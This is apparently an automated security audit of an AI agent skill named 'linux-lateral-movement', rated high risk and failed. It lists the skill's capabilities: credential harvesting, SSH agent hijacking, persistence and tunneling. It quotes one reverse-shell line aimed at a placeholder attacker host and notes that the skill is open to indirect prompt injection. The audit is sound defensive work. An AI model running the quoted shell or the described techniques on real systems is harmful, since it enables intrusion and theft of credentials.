linux-lateral-movement
Fail
Audited by Gen Agent Trust Hub on Apr 9, 2026
Risk Level: HIGHCOMMAND_EXECUTIONDATA_EXFILTRATIONREMOTE_CODE_EXECUTIONCREDENTIALS_UNSAFEEXTERNAL_DOWNLOADSPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: Provides numerous commands for system exploitation, including hijacking SSH agents via socket discovery, monitoring for new sockets in
/tmp, and interacting with D-Bus services to manipulate system units. - [DATA_EXFILTRATION]: Details comprehensive methods for harvesting sensitive information, such as password hashes from
/etc/shadow, SSH private keys, shell histories, and application configuration files containing API keys and database credentials. - [REMOTE_CODE_EXECUTION]: Includes explicit templates for establishing reverse shells (e.g.,
bash -i >& /dev/tcp/ATTACKER/4444 0>&1) and instructions for using tunneling tools to facilitate remote network access. - [CREDENTIALS_UNSAFE]: Actively targets and searches for high-value credentials, including SSH private keys,
.envfiles, and database connection strings across the filesystem. - [PERSISTENCE]: Explains techniques for maintaining long-term access, such as injecting attacker-controlled public keys into
authorized_keysand creating malicious systemd services to run backdoors on startup. - [PROMPT_INJECTION]: The skill possesses a vulnerability surface for indirect prompt injection. It ingests untrusted data from process environments (
/proc/*/environ), shell histories, and remote network shares (NFS/SMB) without implementing boundary markers or sanitization, while maintaining access to dangerous shell execution capabilities. - [EXTERNAL_DOWNLOADS]: References external third-party repositories and tools for exploitation, such as
sudo_injecton GitHub and the network tunneling tool Chisel.
Recommendations
- AI detected serious security threats
Audit Metadata